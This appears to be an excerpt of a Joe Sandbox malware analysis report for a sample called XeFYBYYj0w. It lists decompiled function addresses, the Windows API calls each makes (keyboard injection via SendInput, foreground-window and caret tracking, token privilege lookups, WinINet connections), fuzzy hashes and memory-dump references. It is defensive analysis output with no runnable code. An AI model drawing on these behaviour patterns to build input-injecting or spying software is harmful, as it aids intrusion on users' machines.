Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e07cf67c531c889347d8a5e35242691f06d9df447ee4b2d2451e1fb3c487d3fe
Instruction ID: e15b5831d34e6ed7e1f9af4c4a14a4b1b11315238680ea63bca39f3d176580a7
Opcode Fuzzy Hash: e07cf67c531c889347d8a5e35242691f06d9df447ee4b2d2451e1fb3c487d3fe
Instruction Fuzzy Hash: 5F415B30B006199FCF11DF98D884A697BF5FB69310F1880AAE816DF264D730E842DBD2

Function 00A70AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00A70B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00A70B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00A70BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00A70BFB

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5fa4234be4b23b7e7cfc97fa8460b42a1ef608694260cae879b975fae6d6de14
Instruction ID: 91971eb16b28959aa0037a8466ceddd10c10cadc3cb915e2622343b51e32063d
Opcode Fuzzy Hash: 5fa4234be4b23b7e7cfc97fa8460b42a1ef608694260cae879b975fae6d6de14
Instruction Fuzzy Hash: 9A314870A40218EEFF30CB65CC05FFABBB6ABC5319F04C25AE488921D1C3748A419751

Function 00A70C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00A70C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00A70C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00A70CE1
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00A70D33

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 409536e39c828d8833c3bb0ab8ecbb0ab0a2519e2097359c008b32bf357dd5b2
Instruction ID: 7703ce927f65a3134c4f871b2765b10af14a011ffae34a064f41aaa2bc649d8b
Opcode Fuzzy Hash: 409536e39c828d8833c3bb0ab8ecbb0ab0a2519e2097359c008b32bf357dd5b2
Instruction Fuzzy Hash: 9E31E530A40318EEFF35CB698C05FFEBBBAAB45310F14C35AE489921D1C37599559791

Function 00A461C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A461FB
__isleadbyte_l.LIBCMT ref: 00A46229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A46257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A4628D

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d89cc2993d7f0b406cda77a5790b3a7864bb5afa1c210acd8581fe5029486e59
Instruction ID: 08d8dfa4cec94e88460abcdc01afad9947f8b2eabb5d8b720fcc8db6472f3105
Opcode Fuzzy Hash: d89cc2993d7f0b406cda77a5790b3a7864bb5afa1c210acd8581fe5029486e59
Instruction Fuzzy Hash: 3831D035A04246BFDF218F69CC44BAA7BB9FF82310F154129F824971A1DBB0D950DB92

Function 00A94EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A94F02

Part of subcall function 00A73641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A7365B
Part of subcall function 00A73641: GetCurrentThreadId.KERNEL32 ref: 00A73662
Part of subcall function 00A73641: AttachThreadInput.USER32(00000000,?,00A75005), ref: 00A73669

GetCaretPos.USER32(?), ref: 00A94F13
ClientToScreen.USER32(00000000,?), ref: 00A94F4E
GetForegroundWindow.USER32 ref: 00A94F54

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 61dd444c9deca450103db792e00bad85f2783cb968ca4024d5288caa0c0f00cd
Instruction ID: b84da4c51c5eac400c768802eb7b16a5fd8b7304ce2f17705829ffe6fd88c51e
Opcode Fuzzy Hash: 61dd444c9deca450103db792e00bad85f2783cb968ca4024d5288caa0c0f00cd
Instruction Fuzzy Hash: 66310B72E00108AFDB00EFA5C9959EFB7F9EF99300F10406AE415E7241EA75AE45CBA0

Function 00A9C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623

GetCursorPos.USER32(?), ref: 00A9C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A4B9AB,?,?,?,?,?), ref: 00A9C4E7
GetCursorPos.USER32(?), ref: 00A9C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A4B9AB,?,?,?), ref: 00A9C56E

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 5fee8155ac1608bab45abc6a809fbbe270da9c10b47e79320dfe8e1f09beaba5
Instruction ID: b10f465ffd712a8513c1ebefa7f9c045df0614b610abfcc85d8df97202cc6d6b
Opcode Fuzzy Hash: 5fee8155ac1608bab45abc6a809fbbe270da9c10b47e79320dfe8e1f09beaba5
Instruction Fuzzy Hash: 1731A235700458AFCF15CF98C858EEA7BF5EB49320F45406AF9058B261CB31AD51EBA4

Function 00A68656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A68121
Part of subcall function 00A6810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A6812B
Part of subcall function 00A6810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A6813A
Part of subcall function 00A6810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68141
Part of subcall function 00A6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A686A3
_memcmp.LIBCMT ref: 00A686C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A686FC
HeapFree.KERNEL32(00000000), ref: 00A68703

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 2d6c53835c6c80cf1b4953cf8f0e5f0ababa5a0ea3f58af9390fe3b30776c771
Instruction ID: fab187e302ca2137f01e0845658fa888cf00d08eb3463971b285690ccd8b543a
Opcode Fuzzy Hash: 2d6c53835c6c80cf1b4953cf8f0e5f0ababa5a0ea3f58af9390fe3b30776c771
Instruction Fuzzy Hash: 3321AF71E40109EFDB10DFA4CA49BEEB7B9EF44304F158259E854AB240EB75AE05CB90

Function 00A3098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00A309AE

Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A77896,?,?,00000000), ref: 00A15A2C
Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A77896,?,?,00000000,?,?), ref: 00A15A50

_fprintf.LIBCMT ref: 00A309E5
OutputDebugStringW.KERNEL32(?), ref: 00A65DBB

Part of subcall function 00A34AAA: _flsall.LIBCMT ref: 00A34AC3

__setmode.LIBCMT ref: 00A30A1A

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: bcfe6cf60913cd146d7ffe4af53abd1074388a190298ab8704ccba8a21e2ec90
Instruction ID: 547987faa929ab84ea18a4552c5bc6b9965f7c23e054f1587b788c19210f14b0
Opcode Fuzzy Hash: bcfe6cf60913cd146d7ffe4af53abd1074388a190298ab8704ccba8a21e2ec90
Instruction Fuzzy Hash: 27112431D04204BFDB08B7B4AD4B9FE77AC9F89360F244056F105A7182EF20698687A5

Function 00A81767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A817A3

Part of subcall function 00A8182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A8184C
Part of subcall function 00A8182D: InternetCloseHandle.WININET(00000000), ref: 00A818E9

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: ed9840ebffcdf236d7d286ef599aea11c45517cf2905061f5e98537be5bfa7a5
Instruction ID: 59dc9a53df7a7a624d0324e0bbe5f3b0041c8e1a8f2a258d8ee15e60bc5fd77c
Opcode Fuzzy Hash: ed9840ebffcdf236d7d286ef599aea11c45517cf2905061f5e98537be5bfa7a5
Instruction Fuzzy Hash: 1F219335200605BFEB12AFA0DC41FBABBADFF48711F10402EFA55D6650DB75D8229BA0

Function 00A73A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00A9FAC0), ref: 00A73A64
GetLastError.KERNEL32 ref: 00A73A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00A73A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A9FAC0), ref: 00A73ADF

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 2731abb5a874c4167fcacca3c49d51656d6e127bc1e50cb1e458b09ef7a000ad
Instruction ID: fa1080210a607fd43a63f0d2b0ac80fc7593eab683086345e7181b3dc0a24e21
Opcode Fuzzy Hash: 2731abb5a874c4167fcacca3c49d51656d6e127bc1e50cb1e458b09ef7a000ad
Instruction Fuzzy Hash: 822176755092019F8710DF24CD428AE77E8AE553A4F14CA19F49DC7291DB31DE46DB42

Function 00A6DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00A6DCD3,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?), ref: 00A6F0CB
Part of subcall function 00A6F0BC: lstrcpyW.KERNEL32(00000000,?,?,00A6DCD3,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6F0F1
Part of subcall function 00A6F0BC: lstrcmpiW.KERNEL32(00000000,?,00A6DCD3,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?), ref: 00A6F122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6DCEC
lstrcpyW.KERNEL32(00000000,?,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6DD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6DD46

Strings

cdecl, xrefs: 00A6DD3D

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 466c5a5797ce209d40c57d82cf586de49f77c32098f28852cac727684b7e5f47
Instruction ID: 1095ea73afd2cf2057c15915e8fa70a216c48a9d50f6bd9d156a666c0f0bf6b3
Opcode Fuzzy Hash: 466c5a5797ce209d40c57d82cf586de49f77c32098f28852cac727684b7e5f47
Instruction Fuzzy Hash: D611BB3A200305EFCB25AF74D845D7A77B8FF46390B50812AF906CB2A0EB729851C7E0

Function 00A450E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A45101

Part of subcall function 00A3571C: __FF_MSGBANNER.LIBCMT ref: 00A35733
Part of subcall function 00A3571C: __NMSG_WRITE.LIBCMT ref: 00A3573A
Part of subcall function 00A3571C: RtlAllocateHeap.NTDLL(01100000,00000000,00000001,00000000,?,?,?,00A30DD3,?), ref: 00A3575F

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: a47afb9b35c81dd2d651eb571a6f35b18127c1358c93a710cfba9a9dddf70e7e
Instruction ID: 94bd49a237dcfdccf037e518afdb1d40b410335d5925986e79b0a592518869d6
Opcode Fuzzy Hash: a47afb9b35c81dd2d651eb571a6f35b18127c1358c93a710cfba9a9dddf70e7e
Instruction Fuzzy Hash: 6F113676D00B06AFCF313FB8FD45B6E37989F843A0F20062AF9059A152DF3488418780

Function 00A86369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A77896,?,?,00000000), ref: 00A15A2C
Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A77896,?,?,00000000,?,?), ref: 00A15A50

gethostbyname.WSOCK32(?,?,?), ref: 00A86399
WSAGetLastError.WSOCK32(00000000), ref: 00A863A4
_memmove.LIBCMT ref: 00A863D1
inet_ntoa.WSOCK32(?), ref: 00A863DC

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 2514d5d746aff9a976f4cca25cd9d281993a50427b7ba44e988baa8481daf205
Instruction ID: 93f68a2ef2110335649166461a8793158c1a8a2395347589754d1cb7e0c086f1
Opcode Fuzzy Hash: 2514d5d746aff9a976f4cca25cd9d281993a50427b7ba44e988baa8481daf205
Instruction Fuzzy Hash: 18112B36A00109EFCF04FBA4DE96DEEB7B9AF48310B144065F506A7261DB30AE55DBA1

Function 00A68B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00A68B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A68B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A68B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A68BA4

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 74ba6cfb9bbaf1efd52a874c1f615f27b706e037b6975ad12455425602987e7f
Instruction ID: c439ce7a74d534709b871afa99f18328110973fb18eb7cca9cea2b0d6e89bef0
Opcode Fuzzy Hash: 74ba6cfb9bbaf1efd52a874c1f615f27b706e037b6975ad12455425602987e7f
Instruction Fuzzy Hash: 02114879900218FFEB10DFA5CC84FADBBB8FB48310F2041A5EA00B7290DA716E11DB94

Function 00A11290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623

DefDlgProcW.USER32(?,00000020,?), ref: 00A112D8
GetClientRect.USER32(?,?), ref: 00A4B5FB
GetCursorPos.USER32(?), ref: 00A4B605
ScreenToClient.USER32(?,?), ref: 00A4B610

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

